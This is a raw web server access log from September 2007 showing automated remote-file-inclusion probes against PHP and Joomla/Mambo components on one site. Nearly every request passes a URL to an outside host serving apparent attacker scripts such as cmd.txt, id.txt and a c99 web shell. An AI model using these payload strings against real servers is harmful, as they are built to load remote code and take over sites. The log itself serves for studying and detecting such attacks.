67.28.112.58 - - [23/Sep/2007:17:39:20 -0700] "GET /logs/access_070827.log/index.php3?aide=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:17:39:50 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:17:39:51 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
81.169.134.61 - - [23/Sep/2007:17:40:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:40:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.90.251.169 - - [23/Sep/2007:17:40:04 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.new-fields.com/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.20.89.210 - - [23/Sep/2007:17:40:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:41:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:41:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:41:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:17:41:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:41:30 -0700] "GET /logs/access_070716.log/index2.php?x=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.133.89 - - [23/Sep/2007:17:41:30 -0700] "GET /index2.php?x=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:41:31 -0700] "GET /logs/index2.php?x=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:42:26 -0700] "GET /logs/access_070910.log/index2.php?x=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:17:43:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:17:43:04 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:44:54 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.173.191.235 - - [23/Sep/2007:17:44:54 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:44:54 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:45:03 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:45:33 -0700] "GET /logs/access_070716.log/index2.php?content=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:45:33 -0700] "GET /index2.php?content=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:45:33 -0700] "GET /logs/index2.php?content=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:46:17 -0700] "GET /logs/access_070910.log/index2.php?content=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:49:08 -0700] "GET /logs/access_070910.log/auto.php?inc=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:49:09 -0700] "GET /logs/access_070910.log/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:49:09 -0700] "GET /auto.php?inc=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:17:49:09 -0700] "GET /auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:49:10 -0700] "GET /logs/auto.php?inc=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:49:10 -0700] "GET /logs/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:49:21 -0700] "GET /logs/access_070826.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:17:49:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:17:49:43 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:50:59 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.117.89.69 - - [23/Sep/2007:17:52:39 -0700] "GET /logs//includes/footer.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:53:48 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:53:48 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:53:48 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:53:57 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:57:29 -0700] "GET /logs/access.log/auto.php?inc=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:57:30 -0700] "GET /logs/access.log/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:17:57:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:17:57:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:17:59:03 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
68.180.250.115 - - [23/Sep/2007:18:03:13 -0700] "GET /logs/access.log HTTP/1.0" 200 34865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:06:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:06:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:08:24 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:08:25 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.169.134.61 - - [23/Sep/2007:18:11:22 -0700] "GET /logs/index2.php?x=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:11:22 -0700] "GET /index2.php?x=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:11:31 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.15.220.90 - - [23/Sep/2007:18:12:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delano-e.com/shells/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.15.220.90 - - [23/Sep/2007:18:12:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delano-e.com/shells/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.79.190.18 - - [23/Sep/2007:18:12:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thiaguinho.net/cmds/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.79.190.18 - - [23/Sep/2007:18:12:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://CSSteam.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:18:12:20 -0700] "GET /logs/index.php?pagina=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:12:20 -0700] "GET /logs/index.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:18:12:21 -0700] "GET /index.php?pagina=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:12:21 -0700] "GET /index.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:12:29 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:12:31 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:18:12:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
190.70.107.144 - - [23/Sep/2007:18:12:48 -0700] "GET /logs/index2.php?x=http://200.58.116.201/~guille/conf/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [23/Sep/2007:18:12:48 -0700] "GET /index2.php?x=http://200.58.116.201/~guille/conf/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:13:54 -0700] "GET /logs/index2.php?x=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:18:13:54 -0700] "GET /logs/index2.php?x=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:13:54 -0700] "GET /index2.php?x=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:18:13:55 -0700] "GET /index2.php?x=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.152.140.206 - - [23/Sep/2007:18:14:57 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:18:41 -0700] "GET /logs/access_070806.log/index.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [23/Sep/2007:18:18:41 -0700] "GET /index.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:18:41 -0700] "GET /logs/index.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:18:47 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:18:47 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:18:49 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:18:50 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:18:18:54 -0700] "GET /auto.php?inc=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
121.0.6.175 - - [23/Sep/2007:18:18:57 -0700] "GET /index.php?table=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:19:01 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:19:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.147.192.217 - - [23/Sep/2007:18:19:37 -0700] "GET /logs/access_070716.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:22:55 -0700] "GET /logs/access_070716.log/index.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.70.107.144 - - [23/Sep/2007:18:22:56 -0700] "GET /logs/index2.php?x=http://200.58.116.201/~guille/conf/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [23/Sep/2007:18:22:57 -0700] "GET /index2.php?x=http://200.58.116.201/~guille/conf/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.15.220.90 - - [23/Sep/2007:18:23:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.15.220.90 - - [23/Sep/2007:18:23:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:18:25:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:18:25:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
164.77.116.70 - - [23/Sep/2007:18:25:05 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
164.77.116.70 - - [23/Sep/2007:18:25:06 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.37.50.43 - - [23/Sep/2007:18:25:31 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:25:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
164.77.116.70 - - [23/Sep/2007:18:27:17 -0700] "GET /logs/index.php?action=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
164.77.116.70 - - [23/Sep/2007:18:27:18 -0700] "GET /index.php?action=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.37.50.43 - - [23/Sep/2007:18:29:11 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.150.126.79 - - [23/Sep/2007:18:31:02 -0700] "GET /auto.php?inc=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.150.126.79 - - [23/Sep/2007:18:31:03 -0700] "GET /auto.php?inc=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:32:21 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:32:27 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:18:32:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:18:33:30 -0700] "GET /logs/access_070910.log/auto.php?inc=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.85.142.186 - - [23/Sep/2007:18:33:30 -0700] "GET /logs/auto.php?inc=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [23/Sep/2007:18:35:39 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [23/Sep/2007:18:35:40 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [23/Sep/2007:18:35:40 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [23/Sep/2007:18:35:56 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
217.20.89.210 - - [23/Sep/2007:18:36:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [23/Sep/2007:18:36:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.117.89.69 - - [23/Sep/2007:18:36:20 -0700] "GET /logs//administrator/popups/modulewindow.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.22.24.115 - - [23/Sep/2007:18:39:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.24.115 - - [23/Sep/2007:18:39:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:18:40:21 -0700] "GET /logs/access.log/auto.php?inc=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.18.233.58 - - [23/Sep/2007:18:40:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [23/Sep/2007:18:40:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:43:20 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:43:20 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:18:43:20 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:43:58 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
